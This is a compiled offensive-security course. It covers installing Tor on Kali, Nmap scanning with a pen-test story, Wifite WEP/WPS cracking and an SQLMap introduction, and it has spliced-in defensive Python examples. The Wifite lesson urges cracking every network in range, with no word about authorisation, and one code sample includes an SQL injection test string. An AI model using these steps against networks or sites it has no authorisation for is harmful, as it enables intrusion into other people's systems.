A final note, something we mentioned when we talked: don't fall into the geography trap, assuming that an overseas VPN or one outside your country is somehow safer or more committed to privacy than ones based in your own or subject to your own laws. A local VPN that doesn't keep logs and has none to turn over is more trustworthy than an overseas VPN that logs everything and is happy to turn your data over to anyone who asks—and there are definitely VPN providers that fall in both categories.
 
Tor — a privacy-oriented encrypted anonymizing service — has announced the launch of the next version of its Tor Browser Bundle, i.e. version 4.0.4, intended mainly to improve the built-in utilities and the privacy and security of online users.
Tor Browser helps users browse the Internet in a completely anonymous way. The Tor Browser Bundle, an anonymous web browser developed by the Tor Project, received some updates to its software.
The Tor Browser Bundle is basically an Internet browser based on Mozilla Firefox, configured to protect the users' anonymity via Tor and Vidalia. The anonymity suite also includes three Firefox extensions: Torbutton, NoScript and HTTPS-Everywhere.
NEW FEATURES 
The latest version, Tor Browser Bundle 4.0.4, has been recently released, with a small number of new features:
Update Firefox to 31.5.0esr with important security updates
Update OpenSSL to 1.0.1l
Update NoScript to 2.6.9.15
Update HTTPS-Everywhere to 4.0.3
BUG FIXES
Meanwhile, the new Tor version 4.0.4 also includes some bug fixes:
Bug 14203: Prevent meek from displaying an extra update notification
Bug 14849: Remove new NoScript menu option to make permissions permanent
Bug 14851: Set NoScript pref to disable permanent permissions
"A new release for the stable Tor Browser is available from the Tor Browser Project page and also from 
our distribution directory," states the Tor project team. 
Tor is generally thought of as a place where users come online to hide their activities and remain anonymous. Tor is an encrypted anonymizing network considered to be one of the most privacy-oriented services, and it is mostly used by activists and journalists to circumvent online censorship and surveillance efforts by various countries.
However, late last year we saw a large-scale cyber attack on the Tor network that quietly seized some of its specialized servers called Directory Authorities (DA), the servers that help Tor clients find Tor relays in the anonymous network.
On the other side, last month 12 high-capacity Tor middle relays were launched by Polaris — a new initiative by Mozilla, the Tor Project and the Center for Democracy and Technology — in order to help build more privacy controls into technology. The addition of high-capacity Tor middle relays to the Tor network helps relieve the finite number of Tor connections that can occur at the same time.
 
Installing Tor in Kali Linux: 
 
Step 1: Getting tor service ready 
There are 3 ways of installing Tor service in Kali Linux. You can install Tor by following any of these options: 
 
Option #1: Install Tor from Kali Repository 
Tor is available in Kali repository, to install it directly from the repository open your Terminal and type this: 
apt-get install tor 
If no error occurs, follow the second step. 
 
Option #2: Install Tor from Debian Wheezy Repository 
If you can’t install Tor using the first method then you may try this option. In this way we are going to add the 
official Tor repository according to our Debian distribution. Not to be confused, Kali is actually based on Debian 
and it uses the package management from “Wheezy”. So we are going to use “Wheezy” as our distribution. 
Now open your terminal and follow these steps: 
 
Step #1: Add repo to sources.list file 
Let's add the distribution to the list by opening the sources.list file:
leafpad /etc/apt/sources.list
Now add the following line at the bottom of the file:
deb http://deb.torproject.org/torproject.org wheezy main
 
Step #2: Add GPG Keys 
Now we need to add the GPG key used to sign the packages by running the following commands:
gpg --keyserver keys.gnupg.net --recv 886DDD89
gpg --export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | apt-key add -
 
Step #3: Update package lists 
Let's refresh our sources:
apt-get update 
 
Step #4: Install signing keys
Now, before installing Tor, we must add the signing key:
apt-get install deb.torproject.org-keyring 
 
Step #5: Install Tor from Debian repository 
Finally, 
apt-get install tor 
Now Tor should be installed! 
If no error occurs, follow the second step. 
 
Option #3: Install Tor from development branch 
If you are an advanced user and you want to install Tor using the development branch then this method is for 
you. 
 
Step #1: Add Tor project repository to sources.list
You need to add a different set of lines to your /etc/apt/sources.list file:
deb http://deb.torproject.org/torproject.org wheezy main
deb http://deb.torproject.org/torproject.org tor-experimental-0.2.5.x-wheezy main
 
Step #2: Add GPG keys, keyring and install Tor 
Then run the following commands at your command prompt:
gpg --keyserver keys.gnupg.net --recv 886DDD89
gpg --export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | apt-key add -
apt-get update
apt-get install tor deb.torproject.org-keyring
Now Tor should be installed!
If no error occurs, follow the second step.
Note: This release provides more features, but it contains bugs too.
 
Option #4: Build and Install Tor from sources 
If you want to build your own debs from source you must first add an appropriate deb-src line to sources.list:
deb-src http://deb.torproject.org/torproject.org wheezy main
deb-src http://deb.torproject.org/torproject.org tor-experimental-0.2.5.x-wheezy main
You also need to install the necessary packages to build your own debs and the packages needed to build Tor: 
apt-get install build-essential fakeroot devscripts
apt-get build-dep tor
Then you can build Tor in ~/debian-packages: 
mkdir ~/debian-packages; cd ~/debian-packages
apt-get source tor
cd tor-*
debuild -rfakeroot -uc -us
cd ..
Now you can install the new package: 
dpkg -i tor_*.deb 
 
Step #2: Downloading and Running Tor bundle 
Download the Tor Bundle from here, 
https://www.torproject.org/projects/torbrowser.html.en 
Download the architecture-appropriate file above, save it somewhere, then run one of the following two 
commands to extract the package archive: 
tar -xvzf tor-browser-gnu-linux-i686-2.3.25-15-dev-LANG.tar.gz 
or (for the 64-bit version): 
tar -xvzf tor-browser-gnu-linux-x86_64-2.3.25-16-dev-LANG.tar.gz 
(where LANG is the language listed in the filename). 
Once that's done, switch to the Tor browser directory by running:
cd tor-browser_LANG
(where LANG is the language listed in the filename).
To run the Tor Browser Bundle, execute the start-tor-browser script: 
./start-tor-browser 
This will launch Vidalia and once that connects to Tor, it will launch Firefox. 
Note: Do not unpack or run TBB as root. (though in Kali Linux, it doesn’t make any differences) 
 
Lesson 5: Introduction to NMap 
 
Nmap is a very useful tool, especially for identifying open ports subject to attacks and infiltration, its GUI is user 
friendly and boasts a wide variety of features. 
Nmap (“Network Mapper”) is a free and open source utility for network exploration and security auditing. Many 
systems and network administrators also find it useful for tasks such as network inventory, managing service 
upgrade schedules, and monitoring host or service uptime. Nmap uses raw IP packets in novel ways to 
determine what hosts are available on the network, what services (application name and version) those hosts 
are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls 
are in use, and dozens of other characteristics. It was designed to rapidly scan large networks, but works fine 
against single hosts. Nmap runs on all major computer operating systems, and both console and graphical 
versions are available. 
This chapter uses fictional stories to provide a broad overview of Nmap and how it is typically used. An 
important legal section helps users avoid (or at least be aware of) controversial usage that could lead to ISP 
account cancellation or even civil and criminal charges. It also discusses the risks of crashing remote machines 
as well as miscellaneous issues such as the open source Nmap license (based on the GNU GPL), and 
copyright. 
Nmap Overview and Demonstration 
Sometimes the best way to understand something is to see it in action. This section includes examples of 
Nmap used in (mostly) fictional yet typical circumstances. Nmap newbies should not expect to understand 
everything at once. This is simply a broad overview of features that are described in depth in later chapters. 
The “solutions” included throughout this book demonstrate many other common Nmap tasks for security 
auditors and network administrators. 
Avatar Online 
Felix dutifully arrives at work on December 15th, although he does not expect many structured tasks. The small 
San Francisco penetration-testing firm he works for has been quiet lately due to impending holidays. Felix 
spends business hours pursuing his latest hobby of building powerful Wi-Fi antennas for wireless assessments 
and war driving exploration. Nevertheless, Felix is hoping for more business. Hacking has been his hobby and 
fascination since a childhood spent learning everything he could about networking, security, Unix, and phone 
systems. Occasionally his curiosity took him too far, and Felix was almost swept up in the 1990 Operation 
Sundevil prosecutions. Fortunately Felix emerged from adolescence without a criminal record, while retaining 
his expert knowledge of security weaknesses. As a professional, he is able to perform the same types of 
network intrusions as before, but with the added benefit of contractual immunity from prosecution and even a 
paycheck! Rather than keeping his creative exploits secret, he can brag about them to client management 
when presenting his reports. So Felix was not disappointed when his boss interrupted his antenna soldering to 
announce that the sales department closed a pen-testing deal with the Avatar Online gaming company. 
Avatar Online (AO) is a small company working to create the next generation of massive multi-player online 
role-playing games (MMORPGs). Their product, inspired by the Metaverse envisioned in Neal 
Stephenson's Snow Crash, is fascinating but still highly confidential. After witnessing the high-profile leak of 
Valve Software's upcoming game source code, AO quickly hired the security consultants. Felix's task is to 
initiate an external (from outside the firewall) vulnerability assessment while his partners work on physical 
security, source code auditing, social engineering, and so forth. Felix is permitted to exploit any vulnerabilities 
found. 
The first step in a vulnerability assessment is network discovery. This reconnaissance stage determines what 
IP address ranges the target is using, what hosts are available, what services those hosts are offering, general 
network topology details, and what firewall/filtering policies are in effect. 
Determining the IP ranges to scan would normally be an elaborate process involving ARIN (or another 
geographical registry) lookups, DNS queries and zone transfer attempts, various web sleuthing techniques, and 
more. But in this case, Avatar Online explicitly specified what networks they want tested: the corporate network 
on 6.209.24.0/24 and their production/DMZ systems residing on 6.207.0.0/22. Felix checks the IP whois 
records anyway and confirms that these IP ranges are allocated to AO[1]. Felix subconsciously decodes the 
CIDR notation[2] and recognizes this as 1,280 IP addresses. No problem. 
Being the careful type, Felix first starts out with what is known as an Nmap list scan (-sL option). This feature simply enumerates every IP address in the given target netblock(s) and does a reverse-DNS lookup (unless -n was specified) on each. One reason to do this first is stealth. The names of the hosts can hint at potential vulnerabilities and allow for a better understanding of the target network, all without raising alarm bells[3]. Felix is doing this for another reason—to double-check that the IP ranges are correct. The systems administrator who provided the IPs might have made a mistake, and scanning the wrong company would be a disaster. The contract signed with Avatar Online may act as a get-out-of-jail-free card for penetrating their networks, but will not help if Felix accidentally compromises another company's server! The command he uses and an excerpt of the results are shown in Example 1.1:
felix> nmap -sL 6.209.24.0/24 6.207.0.0/22
Starting Nmap ( http://nmap.org )
Nmap scan report for 6.209.24.0
Nmap scan report for fw.corp.avataronline.com (6.209.24.1)
Nmap scan report for dev2.corp.avataronline.com (6.209.24.2)
Nmap scan report for 6.209.24.3
Nmap scan report for 6.209.24.4
...
Nmap scan report for dhcp-21.corp.avataronline.com (6.209.24.21)
Nmap scan report for dhcp-22.corp.avataronline.com (6.209.24.22)
Nmap scan report for dhcp-23.corp.avataronline.com (6.209.24.23)
...
Nmap scan report for 6.207.0.0
Nmap scan report for gw.avataronline.com (6.207.0.1)
Nmap scan report for ns1.avataronline.com (6.207.0.2)
Nmap scan report for ns2.avataronline.com (6.207.0.3)
Nmap scan report for ftp.avataronline.com (6.207.0.4)
Nmap scan report for 6.207.0.5
Nmap scan report for 6.207.0.6
Nmap scan report for www.avataronline.com (6.207.0.7)
Nmap scan report for 6.207.0.8
...
Nmap scan report for cluster-c120.avataronline.com (6.207.2.120)
Nmap scan report for cluster-c121.avataronline.com (6.207.2.121)
Nmap scan report for cluster-c122.avataronline.com (6.207.2.122)
...
Nmap scan report for 6.207.3.255
Nmap done: 1280 IP addresses (0 hosts up) scanned in 331.49 seconds
felix>
Reading over the results, Felix finds that all of the machines with reverse-DNS entries resolve to Avatar Online. No other businesses seem to share the IP space. Moreover, these results give Felix a rough idea of how many machines are in use and a good idea of what many are used for. He is now ready to get a bit more intrusive and try a port scan. He uses Nmap features that try to determine the application and version number of each service listening on the network. He also requests that Nmap try to guess the remote operating system via a series of low-level TCP/IP probes known as OS fingerprinting. This sort of scan is not at all stealthy, but that does not concern Felix. He is interested in whether the administrators of AO even notice these blatant scans. After a bit of consideration, Felix settles on the following command:
nmap -sS -p- -PE -PP -PS80,443 -PA3389 -PU40125 -A -T4 -oA avatartcpscan-%D 6.209.24.0/24 6.207.0.0/22
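The sanity checks Felix performs on the list scan (counting the addresses in the contracted CIDR blocks and confirming that every reverse-DNS name belongs to the client) are easy to automate. The following Python script is an added example, not code from the Nmap book or from this course; the `nmap -sL` output it parses is constructed from the excerpt above, with one out-of-scope hostname (mail.othercompany.example, an assumption) added to show the check firing.

```python
"""Added example (not from the page): sanity-check an Nmap list scan the way
Felix does in the story: count the addresses in the contracted CIDR blocks,
confirm every reverse-DNS name falls under the client's domain, and confirm
every reported IP lies inside the contracted blocks."""
import ipaddress
import re

# Constructed sample: an abbreviated `nmap -sL` output based on the page's
# excerpt, plus one hostname outside the client's domain (made up here).
SAMPLE_OUTPUT = """\
Starting Nmap ( http://nmap.org )
Nmap scan report for 6.209.24.0
Nmap scan report for fw.corp.avataronline.com (6.209.24.1)
Nmap scan report for dev2.corp.avataronline.com (6.209.24.2)
Nmap scan report for 6.209.24.3
Nmap scan report for ns1.avataronline.com (6.207.0.2)
Nmap scan report for mail.othercompany.example (6.207.0.9)
Nmap done: 1280 IP addresses (0 hosts up) scanned in 331.49 seconds
"""

# Matches both "name (ip)" and bare "ip" report lines.
REPORT_RE = re.compile(
    r"^Nmap scan report for (?:(?P<name>\S+) \((?P<ip1>[\d.]+)\)|(?P<ip2>[\d.]+))$"
)


def address_count(cidrs):
    """Total addresses in the given CIDR blocks (what Felix decodes as 1,280)."""
    return sum(ipaddress.ip_network(c, strict=False).num_addresses for c in cidrs)


def parse_list_scan(text):
    """Return a list of (ip, hostname_or_None) tuples from `nmap -sL` output."""
    hosts = []
    for line in text.splitlines():
        m = REPORT_RE.match(line.strip())
        if not m:
            continue
        if m.group("name"):
            hosts.append((m.group("ip1"), m.group("name")))
        else:
            hosts.append((m.group("ip2"), None))
    return hosts


def out_of_scope(hosts, allowed_domain):
    """Hostnames not under the contracted domain: a sign the IP ranges may be
    wrong or shared with another organisation, so stop and re-verify."""
    domain = allowed_domain.lstrip(".")
    suffix = "." + domain
    return [name for _ip, name in hosts
            if name is not None and name != domain and not name.endswith(suffix)]


def scope_check(cidrs, text, allowed_domain):
    """Summarise the list scan and flag anything that falls outside scope."""
    nets = [ipaddress.ip_network(c, strict=False) for c in cidrs]
    hosts = parse_list_scan(text)
    stray_ips = [ip for ip, _ in hosts
                 if not any(ipaddress.ip_address(ip) in n for n in nets)]
    return {
        "addresses": address_count(cidrs),
        "resolved": sum(1 for _, n in hosts if n),
        "unresolved": sum(1 for _, n in hosts if n is None),
        "foreign_names": out_of_scope(hosts, allowed_domain),
        "stray_ips": stray_ips,
    }


if __name__ == "__main__":
    print(scope_check(["6.209.24.0/24", "6.207.0.0/22"], SAMPLE_OUTPUT, "avataronline.com"))
```

Any entry in `foreign_names` or `stray_ips` is a reason to go back to the client before sending a single probe; the list scan itself sends nothing to the target network except reverse-DNS queries.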
 
Intro – Nmap (“Network Mapper”) is an open source tool for network exploration and security auditing. It was 
designed to rapidly scan large networks, although it works fine against single hosts. It uses raw IP packets in 
novel ways to determine what hosts are available on the network, what services (application name and version) 
those hosts are offering, what operating systems (and OS versions) they are running, what type 
of packet filters/firewalls are in use, and dozens of other characteristics. While Network Mapper is 
commonly used for security audits, many systems and network administrators find it useful for routine tasks 
such as network inventory, managing service upgrade schedules, and monitoring host or service uptime. 
 
1. How to open nmap
A. GUI method
Application → Kali Linux → Information Gathering → DNS Analysis → nmap

B. Terminal method: open a terminal, type nmap and hit Enter
 
2. Scan a single IP address (with the target PC's firewall off or on)
Syntax – nmap <IP address or hostname>
Ex – nmap 192.168.75.131
Ex – nmap google.com

3. Speed up your nmap scan – fast mode scans fewer ports than the default, so it cuts scan time
Syntax – nmap -F <IP address>
Ex – nmap -F google.com

4. Scan multiple IP addresses or a subnet
A. Scan a range of IP addresses
Syntax – nmap <IP address range>
Ex – nmap 192.168.75.1-131

B. Scan a range of IP addresses using a wildcard
Ex – nmap 192.168.75.*

C. Scan an entire subnet
Ex – nmap 192.168.75.1/24

5. Turn on OS detection
Ex – nmap -O 192.168.75.131

6. Scan all TCP ports on the target IP (the -p- option selects all 65535 ports; without it only the default port list is scanned)
Ex – nmap -sT -p- 192.168.75.131

7. Scan a firewall for security weaknesses
A. Null scan – a TCP Null scan sends packets with no flags set, to see how the firewall responds
Ex – nmap -sN 192.168.75.131

B. FIN scan – a TCP FIN scan to check the firewall
Ex – nmap -sF 192.168.75.131

C. TCP Xmas scan to check the firewall
Ex – nmap -sX 192.168.75.131

8. UDP scan – scan a host for UDP services. This scan is used to view open UDP ports.
Ex – nmap -sU 192.168.75.131

9. IP protocol scan – this type of scan allows you to determine which IP protocols (TCP, ICMP, IGMP, etc.) are supported by the target machine.
Ex – nmap -sO 192.168.75.131

10. Detect remote service (server / daemon) version numbers
Ex – nmap -sV 192.168.75.131

11. Find out the most commonly used TCP ports using a TCP SYN scan
A. Stealthy (half-open) scan
Ex – nmap -sS 192.168.75.131

B. Find out the most commonly used TCP ports using a TCP connect scan
Ex – nmap -sT 192.168.75.131

C. Map which ports are filtered or unfiltered using a TCP ACK scan (an ACK scan does not tell open from closed)
Ex – nmap -sA 192.168.75.131

D. Find out the most commonly used TCP ports using a TCP Window scan
Ex – nmap -sW 192.168.75.131

E. Find out the most commonly used TCP ports using a TCP Maimon scan
Ex – nmap -sM 192.168.75.131

12. List scan – this command is used to list the targets that would be scanned, without sending probes to them
Ex – nmap -sL 192.168.75.131

13. Host discovery or ping scan – scan a network and find out which servers and devices are up and running
Ex – nmap -sP 192.168.75.0/24

14. Scan a host that is protected by a firewall (skip host discovery and treat the host as up)
Ex – nmap -Pn 192.168.75.1
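Felix wonders whether AO's administrators notice his scans; this added Python example (not part of the course or of Nmap) shows the defender's side. It reads iptables LOG-style lines (constructed here, not real logs) and flags a source that probes many distinct destination ports on one host within a short window, the pattern that the -sS, -sT and -p- scans in the list above leave behind. The log format, the window and threshold values, and the addresses are assumptions for the example.

```python
"""Added example (not from the page): flag port scans in firewall logs.
Reads iptables LOG-rule style lines and reports any (source, destination)
pair that touched at least `min_ports` distinct destination ports within
`window_seconds`."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log lines (addresses and timestamps are made up):
# eight probes from one source in four seconds, and two ordinary HTTPS
# connections from another source five minutes apart.
SAMPLE_LOG = """\
Mar 10 12:00:01 fw kernel: IN=eth0 OUT= SRC=192.168.75.5 DST=192.168.75.131 PROTO=TCP SPT=40001 DPT=22 SYN
Mar 10 12:00:01 fw kernel: IN=eth0 OUT= SRC=192.168.75.5 DST=192.168.75.131 PROTO=TCP SPT=40002 DPT=23 SYN
Mar 10 12:00:02 fw kernel: IN=eth0 OUT= SRC=192.168.75.5 DST=192.168.75.131 PROTO=TCP SPT=40003 DPT=25 SYN
Mar 10 12:00:02 fw kernel: IN=eth0 OUT= SRC=192.168.75.5 DST=192.168.75.131 PROTO=TCP SPT=40004 DPT=80 SYN
Mar 10 12:00:03 fw kernel: IN=eth0 OUT= SRC=192.168.75.5 DST=192.168.75.131 PROTO=TCP SPT=40005 DPT=110 SYN
Mar 10 12:00:03 fw kernel: IN=eth0 OUT= SRC=192.168.75.5 DST=192.168.75.131 PROTO=TCP SPT=40006 DPT=443 SYN
Mar 10 12:00:04 fw kernel: IN=eth0 OUT= SRC=192.168.75.5 DST=192.168.75.131 PROTO=TCP SPT=40007 DPT=3389 SYN
Mar 10 12:00:04 fw kernel: IN=eth0 OUT= SRC=192.168.75.5 DST=192.168.75.131 PROTO=TCP SPT=40008 DPT=8080 SYN
Mar 10 12:00:05 fw kernel: IN=eth0 OUT= SRC=192.168.75.20 DST=192.168.75.131 PROTO=TCP SPT=51000 DPT=443 SYN
Mar 10 12:05:00 fw kernel: IN=eth0 OUT= SRC=192.168.75.20 DST=192.168.75.131 PROTO=TCP SPT=51001 DPT=443 SYN
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ kernel: .*?SRC=(?P<src>[\d.]+) "
    r"DST=(?P<dst>[\d.]+) PROTO=(?P<proto>\w+) .*?DPT=(?P<dpt>\d+)"
)


def parse_line(line, year=2015):
    """Return (timestamp, src, dst, proto, dport) or None for non-matching lines.
    Syslog timestamps carry no year, so one is supplied (assumed here)."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m.group('ts')}", "%Y %b %d %H:%M:%S")
    return ts, m.group("src"), m.group("dst"), m.group("proto"), int(m.group("dpt"))


def detect_port_scans(log_text, window_seconds=60, min_ports=6):
    """Return {(src, dst): sorted distinct ports} for every source that probed
    at least `min_ports` distinct ports on one destination inside the window."""
    events = [e for e in (parse_line(l) for l in log_text.splitlines()) if e]
    events.sort()
    by_pair = defaultdict(list)
    for ts, src, dst, _proto, dpt in events:
        by_pair[(src, dst)].append((ts, dpt))
    window = timedelta(seconds=window_seconds)
    alerts = {}
    for pair, probes in by_pair.items():
        best = set()
        start = 0
        for end in range(len(probes)):
            # Slide the window start forward until it fits within window_seconds.
            while probes[end][0] - probes[start][0] > window:
                start += 1
            ports = {p for _, p in probes[start:end + 1]}
            if len(ports) >= min_ports and len(ports) > len(best):
                best = ports
        if best:
            alerts[pair] = sorted(best)
    return alerts


if __name__ == "__main__":
    for (src, dst), ports in detect_port_scans(SAMPLE_LOG).items():
        print(f"possible port scan from {src} against {dst}: {len(ports)} ports {ports}")
```

Tune `min_ports` and `window_seconds` to the network: a slow scan (Nmap's -T0/-T1 timing) spreads probes over minutes, so a detector keyed only to a short window misses it and a longer window with a higher threshold is needed alongside.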
 
Lesson 6: Wifi Hacking the easy way: Using WIFITE 
 
Wifite 
While the aircrack-ng suite is a well known name in wireless hacking, the same can't be said about Wifite. Living in the shadow of the established aircrack-ng suite, Wifite has finally made a mark in a field where aircrack-ng failed: it made wifi hacking everyone's piece of cake. While not all its features are independent (e.g. it attacks WPS using Reaver), it does what it promises, and puts hacking on autopilot. I'm listing some features before I tell you how to use wifite (which I don't think is necessary at all, as anyone who can understand the simple English instructions given by Wifite can use it on their own).
Features Of Wifite 
Sorts targets by signal strength (in dB); cracks closest access points first 
Automatically de-authenticates clients of hidden networks to reveal SSIDs 
Numerous filters to specify exactly what to attack (wep/wpa/both, above certain signal strengths, channels, etc)
Customizable settings (timeouts, packets/sec, etc)
"Anonymous" feature; changes MAC to a random address before attacking, then changes back when attacks are complete
All captured WPA handshakes are backed up to wifite.py's current directory 
Smart WPA de-authentication; cycles between all clients and broadcast deauths 
Stop any attack with Ctrl+C, with options to continue, move onto next target, skip to cracking, or exit 
Displays session summary at exit; shows any cracked keys 
All passwords saved to cracked.txt 
Built-in updater: ./wifite.py -upgrade 
I find it worth mentioning here that not only does it hack wifi the easy way, it also hacks in the best possible way. For example, when you are hacking a WEP network using Wifite, it uses fake authentication and the ARP replay method to speed up the collection of data packets.
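The de-authentication behaviour listed above (cycling deauth frames between clients and broadcast) is also exactly what a wireless intrusion detection system looks for. The Python below is an added example, not part of Wifite or of this course: it decodes raw 802.11 management frames from an in-memory sample constructed in the script (no capture file or adapter needed) and reports any BSSID whose deauthentication frame count reaches a threshold. The MAC addresses, the threshold and the sample frames are assumptions.

```python
"""Added example (not from the page): detect a deauthentication flood from
raw 802.11 management frames. Frame layout follows the IEEE 802.11 header:
2-byte frame control, 2-byte duration, three 6-byte addresses (DA, SA, BSSID),
2-byte sequence control; a deauth body then carries a 2-byte reason code."""
import struct
from collections import Counter

DEAUTH_SUBTYPE = 12  # management frame (type 0), subtype 12 = deauthentication
BROADCAST = "ff:ff:ff:ff:ff:ff"


def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def build_frame(subtype, dst, src, bssid, seq, reason=7):
    """Pack a minimal management frame; used only to build the in-memory sample."""
    fc = (0 << 2) | (subtype << 4)  # protocol version 0, type 0 (mgmt), subtype
    hdr = struct.pack("<HH", fc, 0)
    for mac in (dst, src, bssid):
        hdr += bytes.fromhex(mac.replace(":", ""))
    hdr += struct.pack("<H", seq << 4)  # fragment number 0, sequence number
    body = struct.pack("<H", reason) if subtype == DEAUTH_SUBTYPE else b""
    return hdr + body


def parse_mgmt_frame(frame):
    """Return (subtype, dst, src, bssid, reason_or_None) for a management frame,
    or None if the frame is too short or not a management frame."""
    if len(frame) < 24:
        return None
    fc, = struct.unpack_from("<H", frame, 0)
    ftype = (fc >> 2) & 0x3
    subtype = (fc >> 4) & 0xF
    if ftype != 0:
        return None
    dst, src, bssid = frame[4:10], frame[10:16], frame[16:22]
    reason = None
    if subtype == DEAUTH_SUBTYPE and len(frame) >= 26:
        reason, = struct.unpack_from("<H", frame, 24)
    return subtype, mac_str(dst), mac_str(src), mac_str(bssid), reason


def deauth_flood_sources(frames, threshold=5):
    """Count deauth frames per (bssid, destination) and return the pairs whose
    count reaches `threshold`; a real AP rarely sends more than a handful."""
    counts = Counter()
    for f in frames:
        parsed = parse_mgmt_frame(f)
        if parsed and parsed[0] == DEAUTH_SUBTYPE:
            _, dst, _src, bssid, _reason = parsed
            counts[(bssid, dst)] += 1
    return {pair: n for pair, n in counts.items() if n >= threshold}


# Constructed sample (assumed addresses): one legitimate deauth from AP A to a
# client, a burst of ten broadcast deauths carrying AP B's address, and a beacon
# (subtype 8) that the detector must ignore.
AP_A, AP_B = "02:00:00:00:00:aa", "02:00:00:00:00:bb"
CLIENT = "02:00:00:00:00:c1"
SAMPLE_FRAMES = (
    [build_frame(DEAUTH_SUBTYPE, CLIENT, AP_A, AP_A, 1)]
    + [build_frame(DEAUTH_SUBTYPE, BROADCAST, AP_B, AP_B, i) for i in range(2, 12)]
    + [build_frame(8, BROADCAST, AP_A, AP_A, 20)]
)

if __name__ == "__main__":
    print(deauth_flood_sources(SAMPLE_FRAMES))
```

In a live deployment the frames would come from a monitor-mode capture with the radiotap header stripped; the counting logic and the threshold are the parts worth keeping, and the sequence-number field parsed here can additionally expose spoofed frames whose numbering does not match the genuine access point's.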
Hacking WEP network 
wifite -wep 
 
You might even have used the command 
wifite 
 
The -wep option makes it clear to wifite that you want to target WEP networks only. It'll scan the networks for you, and when you think it has scanned enough, you can tell it to stop by pressing Ctrl+C. It'll then ask you which network to attack. In my case, I didn't specify -wep, so it shows all the networks in range.
You can also select all and then go take a nap (or maybe go to sleep). When you wake up, you might have the passwords of all the networks in front of you. I typed one and it had gathered 7000 IVs (data packets) within 5 minutes. Basically you can expect it to crack the network in approximately 10 minutes. Notice how it automatically did the fake auth and ARP replay.
Here are a few more screenshots of Wifite at work, from the official website (the ./wifite.py form is not something that should bother you; you can stick with the simple wifite. Also, specifying the channel is optional, so even the -c 6 was unnecessary. Notice that instead of ARP replay, the fragmentation attack was used, selected with -frag).
 
 Hacking WPS wasn't fast (it took hours), but it was easy and didn't require you to do anything but wait. 
 
However, Wifite makes it possible for you to use any method that you want, just by naming it. As you saw in the screenshot above, the fragmentation attack was carried out just by typing -frag. Similarly, many other attacks can be selected. A good idea would be to execute the following:
wifite -help 
 
This will tell you about the common usage commands, which will be very useful. Here is the list of WEP options for the different attacks:
 WEP 
-wep only target WEP networks [off] 
-pps <num> set the number of packets per second to inject [600] 
-wept <sec> sec to wait for each attack, 0 implies endless [600] 
-chopchop use chopchop attack [on] 
-arpreplay use arpreplay attack [on] 
-fragment use fragmentation attack [on] 
-caffelatte use caffe-latte attack [on] 
-p0841 use -p0841 attack [on] 
-hirte use hirte (cfrag) attack [on] 
-nofakeauth stop attack if fake authentication fails [off] 
-wepca <n> start cracking when number of ivs surpass n [10000] 
-wepsave save a copy of .cap files to this directory [off] 
Troubleshooting 
Wifite quits unexpectedly, stating "Scanning for wireless devices. No wireless interfaces were found. You need to plug in a wifi device or install drivers. Quitting."
Most probably you are running Kali inside a virtual machine. A virtual machine does not support the internal wireless card. Either buy an external wireless card, or do a live boot or a dual boot alongside Windows; in general, anything other than a virtual machine.
Lesson 7: Sql Injection using SQLMap 
 
Disclaimer: using this program on any website without permission is illegal. By reading and/or utilizing this 
tutorial you accept sole responsibility for your actions and release Opsec Cybersecurity Solutions LLC and its 
employees from any legal liability for your actions. 
SQL injection is a way of extracting user login info and other data from insecure SQL databases on companies' servers. It is one of the most common ways sites are hacked.
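To see the flaw that sqlmap looks for at the code level, here is an added Python example (not from the course or from sqlmap) built on an in-memory SQLite table constructed in the script: a lookup by item_id assembled with string concatenation, beside the same lookup with a bound parameter and input validation. The table, its rows and the parameter name are assumptions.

```python
"""Added example (not from the page): the vulnerable and the fixed form of a
parameterised lookup, using SQLite so it runs offline."""
import sqlite3


def make_db():
    """Constructed sample table: two public items and one that must stay hidden."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE items (id INTEGER PRIMARY KEY, name TEXT, public INTEGER)")
    conn.executemany("INSERT INTO items VALUES (?, ?, ?)",
                     [(1, "sword", 1), (2, "shield", 1), (3, "unreleased-map", 0)])
    return conn


def lookup_item_vulnerable(conn, item_id):
    """'Before': the request value is concatenated into the SQL text, so the
    value is no longer just data; it can change the structure of the query."""
    sql = "SELECT name FROM items WHERE public = 1 AND id = " + item_id
    return [row[0] for row in conn.execute(sql)]


def lookup_item_safe(conn, item_id):
    """'After': the value is validated and then bound as a parameter, so the
    database driver treats it strictly as data whatever it contains."""
    if not item_id.isdigit():
        raise ValueError("item_id must be a positive integer")
    sql = "SELECT name FROM items WHERE public = 1 AND id = ?"
    return [row[0] for row in conn.execute(sql, (int(item_id),))]


def demo():
    """Run both forms against a normal value and a constructed tampered value."""
    conn = make_db()
    normal = "2"
    tampered = "2 OR 1=1"  # constructed input; OR binds looser than AND, so the
                           # public = 1 filter no longer applies to every row
    return {
        "vuln_normal": lookup_item_vulnerable(conn, normal),
        "vuln_tampered": lookup_item_vulnerable(conn, tampered),
        "safe_normal": lookup_item_safe(conn, normal),
    }


if __name__ == "__main__":
    print(demo())
```

The vulnerable form returns the hidden row as soon as the input stops being a plain number; the safe form never builds SQL from the input at all, which is the fix regardless of which DBMS from sqlmap's feature list sits behind the application.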
What is SQLMAP 
sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches ranging from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.
 
Features
Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MaxDB database management systems.
Full support for six SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query, stacked queries and out-of-band.
Support to directly connect to the database without passing via a SQL injection, by providing DBMS credentials, IP address, port and database name.
Support to enumerate users, password hashes, privileges, roles, databases, tables and columns.
Automatic recognition of password hash formats and support for cracking them using a dictionary-based attack.
Support to dump database tables entirely, a range of entries or specific columns as per user's choice. The user can also choose to dump only a range of characters from each column's entry.
